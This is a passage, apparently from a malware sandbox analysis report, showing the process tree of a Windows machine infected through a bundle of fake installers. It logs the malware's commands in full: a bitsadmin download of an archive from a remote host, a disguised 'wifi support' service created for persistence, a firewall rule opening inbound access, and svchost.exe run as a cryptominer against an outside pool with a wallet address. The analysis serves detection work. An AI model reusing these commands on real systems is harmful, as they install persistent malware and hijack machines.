                                                                                                                                                                                          PID:5224
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-AUGNF.tmp\Setup3310.tmp
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-AUGNF.tmp\Setup3310.tmp" /SL5="$40394,138429,56832,C:\Users\Admin\AppData\Local\Temp\swrddo2d.elx\Setup3310.exe" /Verysilent /subid=623
                                                                                                                                                                                            7⤵
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                            PID:692
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-9GQ79.tmp\Setup.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-9GQ79.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                              8⤵
                                                                                                                                                                                                PID:4804
                                                                                                                                                                                                • C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe
                                                                                                                                                                                                  "C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"
                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                    PID:5744
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\NMemo3Setp.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\NMemo3Setp.exe" end
                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                        PID:5612
                                                                                                                                                                                                    • C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
                                                                                                                                                                                                      "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                      PID:7036
                                                                                                                                                                                                      • C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"
                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                          PID:4340
                                                                                                                                                                                                      • C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"
                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                        PID:6816
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cklp3jpy.yy3\google-game.exe & exit
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:1652
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\cklp3jpy.yy3\google-game.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\cklp3jpy.yy3\google-game.exe
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:1952
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\cklp3jpy.yy3\google-game.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\cklp3jpy.yy3\google-game.exe" -a
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                          PID:1440
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u0lcekq5.swn\BrowzarBrowser_J013.exe & exit
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:3260
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\u0lcekq5.swn\BrowzarBrowser_J013.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\u0lcekq5.swn\BrowzarBrowser_J013.exe
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          PID:4964
                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nkbr1uq1.1cc\GcleanerWW.exe /mixone & exit
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:2248
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j0salnfn.ydj\toolspab1.exe & exit
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:4384
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\j0salnfn.ydj\toolspab1.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\j0salnfn.ydj\toolspab1.exe
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                              PID:2664
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\j0salnfn.ydj\toolspab1.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\j0salnfn.ydj\toolspab1.exe
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                PID:1272
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\adj4mi3z.qxw\SunLabsPlayer.exe /S & exit
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:7096
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\adj4mi3z.qxw\SunLabsPlayer.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\adj4mi3z.qxw\SunLabsPlayer.exe /S
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                PID:1216
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA94A.tmp\tempfile.ps1"
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                    PID:6032
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA94A.tmp\tempfile.ps1"
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                      PID:6112
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA94A.tmp\tempfile.ps1"
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                        PID:7148
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA94A.tmp\tempfile.ps1"
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                          PID:6236
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA94A.tmp\tempfile.ps1"
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                            PID:7088
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA94A.tmp\tempfile.ps1"
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                              PID:6484
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA94A.tmp\tempfile.ps1"
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                              • Checks for any installed AV software in registry
                                                                                                                                                                                                                              PID:4244
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                              "bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                              • Download via BitsAdmin
                                                                                                                                                                                                                              PID:6964
                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                  PID:6584
                                                                                                                                                                                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -phs4opgQYQzGH8jz -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                  PID:6468
                                                                                                                                                                                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pD83mn5aM5tet4nm -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                    PID:5224
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA94A.tmp\tempfile.ps1"
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                      PID:5960
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA94A.tmp\tempfile.ps1"
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                        PID:5652
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA94A.tmp\tempfile.ps1"
                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                          PID:6400
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA94A.tmp\tempfile.ps1"
                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                            PID:7028
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA94A.tmp\tempfile.ps1"
                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                              PID:4712
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\fjnkJfWrEDeA\fjnkJfWrEDeA.dll" fjnkJfWrEDeA
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                PID:4740
                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\fjnkJfWrEDeA\fjnkJfWrEDeA.dll" fjnkJfWrEDeA
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                                                  PID:7020
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA94A.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                  PID:1196
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA94A.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                                  PID:1852
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA94A.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                    PID:5224
                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA94A.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                      PID:3948
                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA94A.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                        PID:4456
                                                                                                                                                                                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                                                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                          PID:7140
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\5a-96c90-397-ba182-7bd6c34ca4cc1\Jijujeqishe.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\5a-96c90-397-ba182-7bd6c34ca4cc1\Jijujeqishe.exe"
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                                    PID:1548
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\A1D3.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\A1D3.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              PID:6212
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\A1D3.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\A1D3.exe"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                PID:6304
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\A8D9.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\A8D9.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              PID:3312
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\dhspjwoy\
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:2332
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\yorwafro.exe" C:\Windows\SysWOW64\dhspjwoy\
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  PID:5544
                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:6136
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\sc.exe" create dhspjwoy binPath= "C:\Windows\SysWOW64\dhspjwoy\yorwafro.exe /d\"C:\Users\Admin\AppData\Local\Temp\A8D9.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:2716
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" description dhspjwoy "wifi internet conection"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:1756
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\sc.exe" start dhspjwoy
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:4788
                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                          PID:7108
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:6292
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\BE46.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\BE46.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        PID:4480
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:1800
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                              PID:4288
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\E75B.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\E75B.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:5244
                                                                                                                                                                                                                                                          • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:6104
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\dhspjwoy\yorwafro.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\dhspjwoy\yorwafro.exe /d"C:\Users\Admin\AppData\Local\Temp\A8D9.exe"
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                              PID:5976
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                svchost.exe
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                PID:3208
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                  svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:5848
                                                                                                                                                                                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                PID:5068
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                  PID:1032
                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                PID:5528
                                                                                                                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                PID:7012
                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                PID:5744
                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                PID:2716
                                                                                                                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 2716 -s 1228
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                  PID:5556
                                                                                                                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 2716 -s 1480
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                  PID:5456
                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                PID:5296
                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                PID:6432
                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:4236
                                                                                                                                                                                                                                                                • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:6228
                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                    PID:6956
                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                    PID:6588
                                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:6724
                                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:6324
                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                        PID:6868
                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                        PID:5776
                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                        PID:6416
                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
